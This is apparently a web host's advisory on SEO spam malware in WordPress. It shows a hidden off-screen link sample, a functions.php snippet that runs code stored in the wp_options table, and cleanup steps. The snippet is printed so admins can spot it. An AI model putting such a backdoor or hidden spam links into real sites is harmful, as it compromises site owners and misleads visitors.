For our WordPress site admins, we have a new Malware Injection for you to worry about. Its SEO Injection Malware and it’s interesting in how it’s implemented. You have two different “flavors” to this darling injection:
- Injecting HTML code for concealed elements in theme files
- Injecting fake spam posts in the WordPress database
Both have the same result where a hacker loads a web page with spammish links, redirects and keywords for ads all loaded while the site owner has no idea it is even happening.
First, we should look at the concealed elements in theme files. Right off if your finding advertisements for sunglasses on your site where you didn’t add advertisements, you have a problem. A quick search of your files using terms from the ad will reveal the code that’s been inserted into the site.
<p> <a style="display: none; position: absolute; left: -10565px;" href="www.example.com/awesome-shades-by-greg">Awesome Shades by Greg</a></p>
As for the second type of injection, it’s even easier to find. Since it’s injecting itself into WordPress posts, just do a quick search using terms from the ad in your posts search bar. Bam, you will get immediate results showing which posts were infected and need the suspected code removed.
So, what is going on? Your going to find that the culprit is most likely an infected functions.php file which is loading content from the wp_options table of the database. For example, you may find:
$wp_template_css = get_option('themes_css' );
if ( isset( $wp_template_css['style'] ) )
@$wp_template_css['style']( null,$wp_template_css['fonts']($wp_template_css['html']) );
What is suspicious about this code would be the wp_template_css call. This is not the usual method for CSS to be loaded in a WordPress themes. Searching the database for this option reveals the suspect software that requires removal from the database.
If your finding your site infected with this SEO spam you can do a few things to get it cleaned:
- Search the functions.php file for any malicious code.
- The name may change depending how the version of infection but themes_css or a version there of should be removed.
- Check your database for any unknown type of prefixes.Something like backupdb_wp_ instead of just wp_. You’ll want to look for backupdb_wp_posts and backupdb_wp_lstat tables. If your using a different prefix than wp_ than of course the name will vary.
- Remove code, of course, that’s been added to your header, footer, and posts on your WordPress site.
After taking the above actions and you still find spam links on your site, send us a ticket and we will take a look at the problem!